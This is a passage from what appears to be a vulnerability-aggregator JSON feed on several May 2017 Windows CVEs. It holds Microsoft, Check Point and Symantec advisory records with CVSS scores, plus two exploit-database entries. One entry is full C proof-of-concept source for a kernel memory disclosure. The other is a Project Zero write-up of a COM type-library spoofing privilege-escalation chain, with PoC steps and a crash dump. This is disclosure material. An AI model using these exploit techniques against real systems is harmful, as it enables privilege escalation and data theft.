64,512| 07-Apr-2017| 14:22| x86| Not applicable\n", "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "Security update for the Windows COM Elevation of Privilege Vulnerability in Windows Server 2008: May 9, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0244"], "modified": "2017-05-09T07:00:00", "id": "KB4018556", "href": "https://support.microsoft.com/en-us/help/4018556", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:36:01", "description": "An information disclosure vulnerability exists within Microsoft Windows. The vulnerability is caused when Microsoft Windows kernel improperly handles objects in memory. 
Successful exploitation of this issue might lead to leakage of sensitive information from the kernel.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-05-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Kernel Information Disclosure (CVE-2017-0258)", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0258"], "modified": "2017-05-09T00:00:00", "id": "CPAI-2017-0369", "href": "", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-17T11:35:55", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. The vulnerability is due to an error in the way Windows validates input before loading type libraries. 
A remote attacker can exploit this vulnerability to execute arbitrary code.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows COM Elevation of Privilege (CVE-2017-0214)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0214"], "modified": "2017-05-09T00:00:00", "id": "CPAI-2017-0366", "href": "", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T15:46:56", "description": "An elevation of privilege exists in Windows COM Aggregate Marshaler. The vulnerability is due to improper handling of certain objects in memory. 
An attacker who successfully exploited the vulnerability could run arbitrary code with elevated privileges.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 4.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-05-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows COM Elevation of Privilege (CVE-2017-0213)", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213"], "modified": "2017-05-09T00:00:00", "id": "CPAI-2017-0379", "href": "", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}}], "symantec": [{"lastseen": "2021-06-08T19:05:25", "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. 
A local attacker can leverage this issue to disclose sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-05-09T00:00:00", "type": "symantec", "title": "Microsoft Windows Kernel CVE-2017-0258 Local Information Disclosure Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-0258"], "modified": "2017-05-09T00:00:00", "id": "SMNTC-98112", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/98112", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2021-06-08T19:05:26", "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. A local attacker can leverage this issue to execute arbitrary code with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access 
for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as non-executable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-05-09T00:00:00", "type": "symantec", "title": "Microsoft Windows COM CVE-2017-0214 Local Privilege Escalation Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-0214"], "modified": "2017-05-09T00:00:00", "id": "SMNTC-98103", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/98103", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T19:05:25", "bulletinFamily": "software", "cvelist": ["CVE-2017-0244"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to execute arbitrary code in kernel mode with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. 
Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "modified": "2017-05-09T00:00:00", "id": "SMNTC-98109", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/98109", "published": "2017-05-09T00:00:00", "type": "symantec", "title": "Microsoft Windows Kernel CVE-2017-0244 Local Privilege Escalation Vulnerability", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:05:26", "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to execute arbitrary code within the context of the application.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for 
x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-05-09T00:00:00", "type": "symantec", "title": "Microsoft Windows COM CVE-2017-0213 Local Privilege Escalation Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-0213"], "modified": "2017-05-09T00:00:00", "id": "SMNTC-98102", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/98102", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "zdt": [{"lastseen": "2018-04-10T07:41:06", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2017-05-16T00:00:00", "type": "zdt", "title": "Microsoft Windows 7 Kernel - Uninitialized Memory in the Default dacl Descriptor of System Processes", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0258"], "modified": "2017-05-16T00:00:00", "id": "1337DAY-ID-27776", "href": "https://0day.today/exploit/description/27776", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1145\r\n \r\nWe have observed (on Windows 7 32-bit) that for unclear reasons, the kernel-mode structure containing the default DACL of system processes' tokens (lsass.exe, services.exe, ...) has 8 uninitialized bytes at the end, as the size of the structure (ACL.AclSize) is larger than the sum of ACE lengths (ACE_HEADER.AceSize). 
It is possible to read the leftover pool data using a GetTokenInformation(TokenDefaultDacl) call.\r\n \r\nWhen the attached proof-of-concept code is run against a SYSTEM process (pid of the process must be passed in the program argument), on a system with Special Pools enabled for ntoskrnl.exe, output similar to the following can be observed:\r\n \r\n>NtQueryInformationToken.exe 520\r\n00000000: 54 bf 2b 00 02 00 3c 00 02 00 00 00 00 00 14 00 T.+...<.........\r\n00000010: 00 00 00 10 01 01 00 00 00 00 00 05 12 00 00 00 ................\r\n00000020: 00 00 18 00 00 00 02 a0 01 02 00 00 00 00 00 05 ................\r\n00000030: 20 00 00 00 20 02 00 00[01 01 01 01 01 01 01 01] ... ...........\r\n \r\nThe last eight 0x01 bytes are markers inserted by Special Pools, which visibly haven't been overwritten by any actual data prior to being returned to user-mode.\r\n \r\nWhile reading DACLs of system processes may require special privileges (such as the ability to acquire SeDebugPrivilege), the root cause of the behavior could potentially make it possible to also create uninitialized DACLs that are easily accessible by regular users. This could in turn lead to a typical kernel memory disclosure condition, which would allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space. Since it's not clear to us what causes the aberrant behavior, we're reporting it for further analysis to be on the safe side.\r\n \r\nThe proof-of-concept code is mostly based on the example at https://support.microsoft.com/en-us/help/131065/how-to-obtain-a-handle-to-any-process-with-sedebugprivilege.\r\n*/\r\n \r\n#define RTN_OK 0\r\n#define RTN_USAGE 1\r\n#define RTN_ERROR 13\r\n \r\n#include <windows.h>\r\n#include <stdio.h>\r\n \r\nBOOL SetPrivilege(\r\n HANDLE hToken, // token handle\r\n LPCTSTR Privilege, // Privilege to enable/disable\r\n BOOL bEnablePrivilege // TRUE to enable. 
FALSE to disable\r\n );\r\n \r\nvoid DisplayError(LPTSTR szAPI);\r\nVOID PrintHex(PBYTE Data, ULONG dwBytes);\r\n \r\nint main(int argc, char *argv[])\r\n{\r\n HANDLE hProcess;\r\n HANDLE hToken;\r\n int dwRetVal = RTN_OK; // assume success from main()\r\n \r\n // show correct usage for kill\r\n if (argc != 2)\r\n {\r\n fprintf(stderr, \"Usage: %s [ProcessId]\\n\", argv[0]);\r\n return RTN_USAGE;\r\n }\r\n \r\n if (!OpenThreadToken(GetCurrentThread(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, FALSE, &hToken))\r\n {\r\n if (GetLastError() == ERROR_NO_TOKEN)\r\n {\r\n if (!ImpersonateSelf(SecurityImpersonation))\r\n return RTN_ERROR;\r\n \r\n if (!OpenThreadToken(GetCurrentThread(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, FALSE, &hToken)){\r\n DisplayError(L\"OpenThreadToken\");\r\n return RTN_ERROR;\r\n }\r\n }\r\n else\r\n return RTN_ERROR;\r\n }\r\n \r\n // enable SeDebugPrivilege\r\n if (!SetPrivilege(hToken, SE_DEBUG_NAME, TRUE))\r\n {\r\n DisplayError(L\"SetPrivilege\");\r\n \r\n // close token handle\r\n CloseHandle(hToken);\r\n \r\n // indicate failure\r\n return RTN_ERROR;\r\n }\r\n \r\n CloseHandle(hToken);\r\n \r\n // open the process\r\n if ((hProcess = OpenProcess(\r\n PROCESS_QUERY_INFORMATION,\r\n FALSE,\r\n atoi(argv[1]) // PID from commandline\r\n )) == NULL)\r\n {\r\n DisplayError(L\"OpenProcess\");\r\n return RTN_ERROR;\r\n }\r\n \r\n // Open process token.\r\n if (!OpenProcessToken(hProcess, TOKEN_READ, &hToken)) {\r\n DisplayError(L\"OpenProcessToken\");\r\n return RTN_ERROR;\r\n }\r\n \r\n DWORD ReturnLength = 0;\r\n if (!GetTokenInformation(hToken, TokenDefaultDacl, NULL, 0, &ReturnLength) && GetLastError() != ERROR_INSUFFICIENT_BUFFER) {\r\n DisplayError(L\"GetTokenInformation #1\");\r\n return RTN_ERROR;\r\n }\r\n \r\n PBYTE OutputBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, ReturnLength);\r\n if (!GetTokenInformation(hToken, TokenDefaultDacl, OutputBuffer, ReturnLength, &ReturnLength)) {\r\n DisplayError(L\"GetTokenInformation 
#2\");\r\n return RTN_ERROR;\r\n }\r\n \r\n PrintHex(OutputBuffer, ReturnLength);\r\n \r\n // close handles\r\n HeapFree(GetProcessHeap(), 0, OutputBuffer);\r\n CloseHandle(hProcess);\r\n \r\n return dwRetVal;\r\n}\r\n \r\nBOOL SetPrivilege(\r\n HANDLE hToken, // token handle\r\n LPCTSTR Privilege, // Privilege to enable/disable\r\n BOOL bEnablePrivilege // TRUE to enable. FALSE to disable\r\n )\r\n{\r\n TOKEN_PRIVILEGES tp;\r\n LUID luid;\r\n TOKEN_PRIVILEGES tpPrevious;\r\n DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES);\r\n \r\n if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE;\r\n \r\n // \r\n // first pass. get current privilege setting\r\n // \r\n tp.PrivilegeCount = 1;\r\n tp.Privileges[0].Luid = luid;\r\n tp.Privileges[0].Attributes = 0;\r\n \r\n AdjustTokenPrivileges(\r\n hToken,\r\n FALSE,\r\n &tp,\r\n sizeof(TOKEN_PRIVILEGES),\r\n &tpPrevious,\r\n &cbPrevious\r\n );\r\n \r\n if (GetLastError() != ERROR_SUCCESS) return FALSE;\r\n \r\n // \r\n // second pass. set privilege based on previous setting\r\n // \r\n tpPrevious.PrivilegeCount = 1;\r\n tpPrevious.Privileges[0].Luid = luid;\r\n \r\n if (bEnablePrivilege) {\r\n tpPrevious.Privileges[0].Attributes |= (SE_PRIVILEGE_ENABLED);\r\n }\r\n else {\r\n tpPrevious.Privileges[0].Attributes ^= (SE_PRIVILEGE_ENABLED &\r\n tpPrevious.Privileges[0].Attributes);\r\n }\r\n \r\n AdjustTokenPrivileges(\r\n hToken,\r\n FALSE,\r\n &tpPrevious,\r\n cbPrevious,\r\n NULL,\r\n NULL\r\n );\r\n \r\n if (GetLastError() != ERROR_SUCCESS) return FALSE;\r\n \r\n return TRUE;\r\n}\r\n \r\nvoid DisplayError(\r\n LPTSTR szAPI // pointer to failed API name\r\n )\r\n{\r\n LPTSTR MessageBuffer;\r\n DWORD dwBufferLength;\r\n \r\n fwprintf(stderr, L\"%s() error!\\n\", szAPI);\r\n \r\n if (dwBufferLength = FormatMessage(\r\n FORMAT_MESSAGE_ALLOCATE_BUFFER |\r\n FORMAT_MESSAGE_FROM_SYSTEM,\r\n NULL,\r\n GetLastError(),\r\n GetSystemDefaultLangID(),\r\n (LPTSTR)&MessageBuffer,\r\n 0,\r\n NULL\r\n ))\r\n {\r\n DWORD 
dwBytesWritten;\r\n \r\n // \r\n // Output message string on stderr\r\n // \r\n WriteFile(\r\n GetStdHandle(STD_ERROR_HANDLE),\r\n MessageBuffer,\r\n dwBufferLength,\r\n &dwBytesWritten,\r\n NULL\r\n );\r\n \r\n // \r\n // free the buffer allocated by the system\r\n // \r\n LocalFree(MessageBuffer);\r\n }\r\n}\r\n \r\nVOID PrintHex(PBYTE Data, ULONG dwBytes) {\r\n for (ULONG i = 0; i < dwBytes; i += 16) {\r\n printf(\"%.8x: \", i);\r\n \r\n for (ULONG j = 0; j < 16; j++) {\r\n if (i + j < dwBytes) {\r\n printf(\"%.2x \", Data[i + j]);\r\n }\r\n else {\r\n printf(\"?? \");\r\n }\r\n }\r\n \r\n for (ULONG j = 0; j < 16; j++) {\r\n if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {\r\n printf(\"%c\", Data[i + j]);\r\n }\r\n else {\r\n printf(\".\");\r\n }\r\n }\r\n \r\n printf(\"\\n\");\r\n }\r\n}\n\n# 0day.today [2018-04-10] #", "sourceHref": "https://0day.today/exploit/27776", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-05T05:13:31", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2017-05-17T00:00:00", "type": "zdt", "title": "Microsoft Windows - Running Object Table Register ROTFLAGS_ALLOWANYCLIENT Privilege Escalation Explo", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0214"], "modified": "2017-05-17T00:00:00", "id": "1337DAY-ID-27797", "href": "https://0day.today/exploit/description/27797", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1112\r\n \r\nWindows: Running Object Table Register ROTFLAGS_ALLOWANYCLIENT EoP\r\nPlatform: Windows 10 10586/14393 not tested 8.1 Update 2 or Windows 7\r\nClass: Elevation of Privilege\r\n \r\nSummary:\r\nBy setting an appropriate AppID it\u2019s possible for a normal user process to set a global ROT entry. 
This can be abused to elevate privileges.\r\n \r\nDescription:\r\n \r\nNOTE: I\u2019m not sure which part of this chain to really report. As far as I can tell it\u2019s pretty much all by design and fixing the initial vector seems difficult. Perhaps this is only a bug which can be fixed to prevent sandbox escapes?\r\n \r\nWhen registering an object in the ROT the default is to only expose that registration to the same user identity on the same desktop/window station. This includes preventing the same user at different ILs (such as between sandbox and normal user) from seeing the same registration. However it could be imagined that you might want to register an entry for all users/contexts so IRunningObjectTable::Register takes a grfFlags parameter with the value ROTFLAGS_ALLOWANYCLIENT which allows the ROT entry to be exposed to all users. \r\n \r\nThe description of this flag indicates it can only be used if the COM process is a Local Service or a RunAs application. In fact there\u2019s an explicit ROTFlags value for the AppID which would grant the privilege to a normal application. Quick testing proves this to be correct, a \u201cnormal\u201d application cannot expose the ROT entry to any client as RPCSS does a check that the calling process is allowed to expose the entry. However there are two clear problems with the check. Creating a RunAs COM object in the current session would typically run at the same privilege level as the caller, therefore an application which wanted to abuse this feature could inject code into that process. Secondly while it\u2019s not possible to register a per-user COM object which specifies a RunAs AppID it\u2019s possible to explicitly set the AppID when calling CoInitializeSecurity (either via the GUID or by naming your program to match one which maps to the correct AppID).\r\n \r\nTherefore in the current implementation effectively any process, including sandboxed ones should be able to register a global ROT entry. 
What can we do with this? The ROT is mainly used for OLE duties, for example Word and Visual Studio register entries for each document/project open. It would be nice not to rely on this, so instead I\u2019ll abuse another OLE component, which we\u2019ve seen before, the fact that LoadTypeLib will fall back to a moniker if it can\u2019t find the type library file specified.\r\n \r\nIf the file loading fails then LoadTypeLib will effectively call MkParseDisplayName on the passed in string. One of the things MPDN does is try and create a file moniker with the string passed in as an argument. File Monikers have an interesting feature, the COM libraries will check if there\u2019s a registered ROT entry for this file moniker already present; if it is, instead of creating a new object it will call IRunningObjectTable::GetObject instead when binding. So as we can register a ROT entry for any user in any context we can provide our own implementation of ITypeLib running inside our process, by registering it against the path to the type library any other process which tries to open that library would instead get our spoofed one, assuming we can force the file open to fail.\r\n \r\nThis is the next key part, looking at the LoadTypeLib implementation the code calls FindTypeLib; if this function fails the code will fall back to the moniker route. There are two opportunities here, firstly CreateFile is called on the path, we could cause this to fail by opening the file with no sharing mode, in theory it should fail. However in practice it doesn\u2019t; most type libraries are in system locations, if you don\u2019t have the possibility of write permission on the file the OS automatically applies FILE_SHARE_READ which makes it impossible to lock the file in its entirety. Also some TLBs are stored inside a DLL which is then used so this route is out. Instead the other route is more promising, VerifyIsExeOrTlb is called once the file is open to check the type of file to parse. 
This function tries to load the first 64 bytes and checks for magic signatures. We can cause the read to fail by using the LockFile API to put an exclusive lock on that part of the file. This also has the advantage that it doesn\u2019t affect file mappings so will also work with loaded DLLs. \r\n \r\nWe now can cause any user of a type library to get redirected to our \u201cfake\u201d one without abusing impersonation/symbolic link tricks. How can we use this to our advantage? The final trick is to abuse again the auto-generation of Stubs/Proxies from automation compatible interfaces. If we can get a more privileged process to use our type library when creating a COM stub we can cause a number of memory safety issues such as type confusion, arbitrary memory read/writes and extending the vtable to call arbitrary functions. This is an extremely powerful primitive, as long as you can find a more privileged process which uses a dual automation interface. For example the FlashBroker which is installed on every Win8+ machine is intentionally allowed to be created by sandboxed IE/Edge and uses dual interfaces with auto-generated Stubs. We could abuse for example the BrokerPrefSetExceptionDialogSize and BrokerPrefGetExceptionDialogSize to do arbitrary memory writes. This all works because the stub creation has no way of ensuring that the actual server implementation matches the generated stub (at least without full symbols) so it will blindly marshal pointers or call outside of the object's vtable.\r\n \r\nProof of Concept:\r\n \r\nI\u2019ve provided a PoC as a C# project. You need to compile it first. It fakes out the Windows Search Service\u2019s type library to modify the IGatherManagerAdmin2::GetBackoffReason method so that instead of marshaling a pointer to an integer for returning the caller can specify an arbitrary pointer value. When the method on the server side completes it will try and write a value to this address which will cause a Write AV. 
The Windows Search service would be ideal for abuse but many of the functions seem to require Administrator access to call. That\u2019s not to say you couldn\u2019t convert this into a full working exploit but I didn\u2019t.\r\n \r\n1) Compile the C# project. It should be compiled as a 64 bit executable.\r\n2) Restart the Windows Search service just to ensure it hasn\u2019t cached the stub previously. This probably isn\u2019t necessary but just to be certain.\r\n3) Attach a debugger to SearchIndexer.exe to catch the crash.\r\n4) Execute the PoC as a normal user (do not run under the VSHOST as the CoInitializeSecurity call will fail). You need to pass the path to the provided mssitlb.tlb file which has been modified appropriately.\r\n5) The service should crash trying to write a value to address 0x12345678\r\n \r\nCrash Dump:\r\n \r\n0:234> r\r\nrax=0000015ee04665a0 rbx=0000015ee0466658 rcx=0000015ee0466658\r\nrdx=0000000000000000 rsi=0000000000000004 rdi=0000000000000000\r\nrip=00007fff80e3a75d rsp=00000036541fdae0 rbp=00000036541fdb20\r\n r8=00000036541fd868 r9=0000015ee3bb50b0 r10=0000000000000000\r\nr11=0000000000000246 r12=0000015ee3c02988 r13=00000036541fe1c0\r\nr14=0000000012345678 r15=0000000000000000\r\niopl=0 nv up ei pl zr na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\r\nMSSRCH!CGatheringManager::GetBackoffReason+0x8d:\r\n00007fff`80e3a75d 418936 mov dword ptr [r14],esi ds:00000000`12345678=????????\r\n0:234> k\r\n # Child-SP RetAddr Call Site\r\n00 00000036`541fdae0 00007fff`b416d533 MSSRCH!CGatheringManager::GetBackoffReason+0x8d\r\n01 00000036`541fdb10 00007fff`b413b0d0 RPCRT4!Invoke+0x73\r\n02 00000036`541fdb60 00007fff`b2fa479a RPCRT4!NdrStubCall2+0x430\r\n03 00000036`541fe180 00007fff`b3853c93 combase!CStdStubBuffer_Invoke+0x9a [d:\\th\\com\\combase\\ndr\\ndrole\\stub.cxx @ 1446]\r\n04 00000036`541fe1c0 00007fff`b305ccf2 OLEAUT32!CUnivStubWrapper::Invoke+0x53\r\n05 (Inline Function) --------`-------- 
